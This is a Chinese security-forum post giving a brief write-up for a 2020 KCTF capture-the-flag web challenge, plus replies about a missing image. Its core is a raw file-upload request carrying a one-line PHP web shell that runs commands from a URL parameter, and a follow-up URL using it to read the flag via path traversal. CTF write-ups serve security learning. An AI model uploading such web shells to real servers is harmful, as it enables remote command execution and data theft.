[原创]2020KCTF 第八题牛刀小试 wp-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[原创]2020KCTF 第八题牛刀小试 wp

发表于: 2020-5-1 22:41 5886

[原创]2020KCTF 第八题牛刀小试 wp

会飞的锅

2020-5-1 22:41

5886

贴上传请求报文

POST /index.php HTTP/1.1
Host: 47.102.223.17:2333
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=--------361693857
Content-Length: 183

----------361693857
Content-Disposition: form-data; name="file";filename="1.php"
content-type:text/php

{"asd":"<?php $cmd = $_GET['cmd'];echo `$cmd`;?>"}
----------361693857--

访问链接

http://47.102.223.17:2333/upload/1833916211.php?cmd=cat%20../../../../flag

另外怀疑是不是题目出错了，正则表达式这块出现问题

匹配不到字符

删除首尾/后成功匹配

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

最后于 2020-5-2 11:33 被会飞的锅编辑，原因：上传图片

收藏・0

免费・0

支持

最新回复 (2)
kanxue 雪币： 47147 活跃值： (20430) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 539 关注私信	kanxue 8 2 楼图片丢失，重新上传下 2020-5-1 23:30 0
会飞的锅雪币： 18468 活跃值： (2352) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 81 粉丝 1 关注私信	会飞的锅 3 楼 kanxue 图片丢失，重新上传下上传到tmp目录，保存一下就成这样了，折腾了五六次，还没整好 2020-5-2 11:34 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

会飞的锅

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区

最新回复 (2)
kanxue 雪币： 47147 活跃值： (20430) 能力值： (RANK：350 ) 在线值：发帖 2375 回帖 17045 粉丝 539 关注私信	kanxue 8 2 楼图片丢失，重新上传下 2020-5-1 23:30 0
会飞的锅雪币： 18468 活跃值： (2352) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 81 粉丝 1 关注私信	会飞的锅 3 楼 kanxue 图片丢失，重新上传下上传到tmp目录，保存一下就成这样了，折腾了五六次，还没整好 2020-5-2 11:34 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[原创]2020KCTF 第八题 牛刀小试 wp

[原创]2020KCTF 第八题牛刀小试 wp